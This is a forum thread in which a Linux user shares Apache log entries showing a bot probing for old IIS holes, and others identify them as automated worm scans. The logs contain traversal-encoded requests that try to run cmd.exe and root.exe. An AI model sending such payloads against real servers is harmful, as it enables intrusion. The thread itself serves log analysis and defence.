Find the answer to your Linux question:
Results 1 to 3 of 3
Well I'm starting to mess around with my apache logs a bit figuring out some stuff I can do with them and I keep coming accross little sections of the ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Linux User
    Join Date
    Jun 2003
    Location
    Huntington Beach, CA
    Posts
    390

    going through apache logs, found something wacky


    Well I'm starting to mess around with my apache logs a bit figuring out some stuff I can do with them and I keep coming accross little sections of the following throughout:
    Code:
    24.14.8.171 - - [07/Jan/2004:15:36:37 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:37 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-
    "
    24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:45 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:45 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    I'm not sure what it is, looks like a hack attempt, but my guess is it's not good, any thoughts?

  2. #2
    Linux Guru
    Join Date
    Oct 2001
    Location
    Täby, Sweden
    Posts
    7,578
    It's just automated crackbots on the internet doing subnet scanning for IIS vulnarabilities (I'd guess those are the old CodeRed bots). The best thing you can do is report them to their ISPs, so that at least they're made aware that they are cracked.

  3. #3
    Linux Guru lakerdonald's Avatar
    Join Date
    Jun 2004
    Location
    St. Petersburg, FL
    Posts
    5,035
    i'd say a stupid hacker who doesnt realize it's a linux box
    he's trying to get access to your box i'd say.
    yikes,
    -lakerdonald

  4. $spacer_open
    $spacer_close

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •